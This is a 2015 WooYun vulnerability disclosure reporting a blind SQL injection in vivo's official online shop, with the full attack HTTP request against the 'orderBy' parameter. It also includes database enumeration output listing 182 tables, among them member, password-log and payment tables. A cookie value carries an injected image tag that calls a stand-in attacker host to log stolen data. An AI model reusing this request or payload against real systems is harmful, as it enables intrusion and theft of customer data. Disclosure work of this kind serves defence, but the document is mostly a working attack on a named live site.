当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121816

漏洞标题:vivo智能手机官方商城存在漏洞导致数据泄露

相关厂商:vivo智能手机

漏洞作者: thewind

提交时间:2015-06-20 23:01

修复时间:2015-06-25 23:02

公开时间:2015-06-25 23:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-20: 细节已通知厂商并且等待厂商处理中
2015-06-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

手机商城的漏洞

详细说明:

hello

漏洞证明:

shop.vivo.com.cn


2.png


POST盲注

POST /gallery-ajax_get_goods.html HTTP/1.1
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://shop.vivo.com.cn:80/
Cookie: s=ebb5b05749aee0c61fae46410fb69ad1; vary=0c5b5e6f5531906a298dd31796d1d58b292b01cacec671a7013fa39a266bad1c; S[CART_COUNT]=0; S[CART_NUMBER]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00; cart[go_back_link]=http%3A%2F%2Fshop.vivo.com.cn%3A80%2F; S[GALLERY][FILTER]=nofilter; S[SEARCH_KEY]=e%26lt%3Bimg%2520sRc%3D%27http%3A%2F%2Fattacker-961779%2Flog.php%3F
Host: shop.vivo.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
cat_id=&orderBy=123&scontent=n,the&showtype=list&&virtual_cat_id=


字段

orderBy


3.png


数据库

available databases [8]:
[*] cacti
[*] information_schema
[*] mysql
[*] performance_schema
[*] seckill
[*] test
[*] vivo0c07
[*] vivo_qhm


这当中还少了一个所属的数据库

vivo_store


只是看了下数据库的表

Database: vivo_store
[182 tables]
+-----------------------------------------+
| sdb_aftersales_return_product           |
| sdb_apiactionlog_apilog                 |
| sdb_b2c_archive_orders                  |
| sdb_b2c_brand                           |
| sdb_b2c_cart                            |
| sdb_b2c_cart_objects                    |
| sdb_b2c_college                         |
| sdb_b2c_comment_goods_point             |
| sdb_b2c_comment_goods_type              |
| sdb_b2c_contract_package                |
| sdb_b2c_contract_package_numbers        |
| sdb_b2c_counter                         |
| sdb_b2c_counter_attach                  |
| sdb_b2c_coupon_map                      |
| sdb_b2c_coupon_vivo                     |
| sdb_b2c_coupon_vivo_info                |
| sdb_b2c_coupon_vivo_list                |
| sdb_b2c_coupon_vivo_xshot               |
| sdb_b2c_coupons                         |
| sdb_b2c_delivery                        |
| sdb_b2c_delivery_items                  |
| sdb_b2c_dly_h_area                      |
| sdb_b2c_dlycorp                         |
| sdb_b2c_dlytype                         |
| sdb_b2c_flashlottery_aog                |
| sdb_b2c_flashlottery_award              |
| sdb_b2c_flashlottery_winner             |
| sdb_b2c_goods                           |
| sdb_b2c_goods_cat                       |
| sdb_b2c_goods_contract_package          |
| sdb_b2c_goods_keywords                  |
| sdb_b2c_goods_lv_price                  |
| sdb_b2c_goods_promotion_ref             |
| sdb_b2c_goods_question                  |
| sdb_b2c_goods_rate                      |
| sdb_b2c_goods_spec_index                |
| sdb_b2c_goods_store_prompt              |
| sdb_b2c_goods_type                      |
| sdb_b2c_goods_type_props                |
| sdb_b2c_goods_type_props_value          |
| sdb_b2c_goods_type_spec                 |
| sdb_b2c_goods_virtual_cat               |
| sdb_b2c_lottery_award                   |
| sdb_b2c_lottery_log                     |
| sdb_b2c_lottery_winner                  |
| sdb_b2c_member_addrs                    |
| sdb_b2c_member_advance                  |
| sdb_b2c_member_college                  |
| sdb_b2c_member_comments                 |
| sdb_b2c_member_coupon                   |
| sdb_b2c_member_goods                    |
| sdb_b2c_member_limit_ip                 |
| sdb_b2c_member_lv                       |
| sdb_b2c_member_msg                      |
| sdb_b2c_member_point                    |
| sdb_b2c_member_pwdlog                   |
| sdb_b2c_member_secret                   |
| sdb_b2c_member_share_history            |
| sdb_b2c_member_systmpl                  |
| sdb_b2c_members                         |
| sdb_b2c_order_coupon_user               |
| sdb_b2c_order_delivery                  |
| sdb_b2c_order_items                     |
| sdb_b2c_order_log                       |
| sdb_b2c_order_objects                   |
| sdb_b2c_order_pmt                       |
| sdb_b2c_orders                          |
| sdb_b2c_preorders_sales_rule            |
| sdb_b2c_products                        |
| sdb_b2c_reship                          |
| sdb_b2c_reship_items                    |
| sdb_b2c_sales_rule_goods                |
| sdb_b2c_sales_rule_order                |
| sdb_b2c_sell_logs                       |
| sdb_b2c_shop                            |
| sdb_b2c_spec_values                     |
| sdb_b2c_specification                   |
| sdb_b2c_type_brand                      |
| sdb_b2c_xfive_coupon_log                |
| sdb_b2c_xfiveblue_preorder              |
| sdb_b2c_xfivepro_preorder               |
| sdb_base_app_content                    |
| sdb_base_apps                           |
| sdb_base_cache_expires                  |
| sdb_base_crontab                        |
| sdb_base_files                          |
| sdb_base_kvstore                        |
| sdb_base_network                        |
| sdb_base_queue                          |
| sdb_base_rpcnotify                      |
| sdb_base_rpcpoll                        |
| sdb_base_syscache_resources             |
| sdb_content_article_bodys               |
| sdb_content_article_indexs              |
| sdb_content_article_nodes               |
| sdb_couponlog_order_coupon_ref          |
| sdb_couponlog_order_coupon_user         |
| sdb_dbeav_meta_register                 |
| sdb_dbeav_meta_value_datetime           |
| sdb_dbeav_meta_value_decimal            |
| sdb_dbeav_meta_value_int                |
| sdb_dbeav_meta_value_longtext           |
| sdb_dbeav_meta_value_text               |
| sdb_dbeav_meta_value_varchar            |
| sdb_dbeav_recycle                       |
| sdb_desktop_filter                      |
| sdb_desktop_flow                        |
| sdb_desktop_hasrole                     |
| sdb_desktop_menus                       |
| sdb_desktop_recycle                     |
| sdb_desktop_role_flow                   |
| sdb_desktop_roles                       |
| sdb_desktop_tag                         |
| sdb_desktop_tag_rel                     |
| sdb_desktop_user_flow                   |
| sdb_desktop_users                       |
| sdb_ectools_analysis                    |
| sdb_ectools_analysis_logs               |
| sdb_ectools_currency                    |
| sdb_ectools_order_bills                 |
| sdb_ectools_payments                    |
| sdb_ectools_payments_log_callback       |
| sdb_ectools_payments_log_request        |
| sdb_ectools_pefunds                     |
| sdb_ectools_regions                     |
| sdb_express_dly_center                  |
| sdb_express_print_tmpl                  |
| sdb_gift_cat                            |
| sdb_gift_ref                            |
| sdb_image_image                         |
| sdb_image_image_attach                  |
| sdb_importexport_task                   |
| sdb_logisticstrack_logistic_log         |
| sdb_operatorlog_logs                    |
| sdb_operatorlog_normallogs              |
| sdb_operatorlog_register                |
| sdb_pam_account                         |
| sdb_pam_auth                            |
| sdb_pam_bind_tag                        |
| sdb_pam_log                             |
| sdb_pointprofessional_member_point_task |
| sdb_preorderlog_order_preorder_user     |
| sdb_site_activities_survey              |
| sdb_site_activities_xfivepro            |
| sdb_site_explorers                      |
| sdb_site_index_page                     |
| sdb_site_link                           |
| sdb_site_lucky_draw                     |
| sdb_site_menus                          |
| sdb_site_modules                        |
| sdb_site_purchase                       |
| sdb_site_route_statics                  |
| sdb_site_seo                            |
| sdb_site_themes                         |
| sdb_site_themes_file                    |
| sdb_site_themes_tmpl                    |
| sdb_site_widgets                        |
| sdb_site_widgets_instance               |
| sdb_site_widgets_proinstance            |
| sdb_system_matrixset                    |
| sdb_system_queue_mysql                  |
| sdb_timedbuy_objitems                   |
| sdb_upimage_upimage                     |
| sdb_wap_explorers                       |
| sdb_wap_menus                           |
| sdb_wap_modules                         |
| sdb_wap_seo                             |
| sdb_wap_themes                          |
| sdb_wap_themes_file                     |
| sdb_wap_themes_tmpl                     |
| sdb_wap_widgets                         |
| sdb_wap_widgets_instance                |
| sdb_weixin_alert                        |
| sdb_weixin_bind                         |
| sdb_weixin_menus                        |
| sdb_weixin_message                      |
| sdb_weixin_message_image                |
| sdb_weixin_message_text                 |
| sdb_weixin_safeguard                    |
| tmp_53aa3e378d690                       |
| tmp_53bbb6d760ad5                       |
| tmp_53bbc08212460                       |
+-----------------------------------------+


不看数据了···
但是,是手机商城的,危害应该不小吧

修复方案:

过滤·

版权声明:转载请注明来源 thewind@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-25 23:02

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无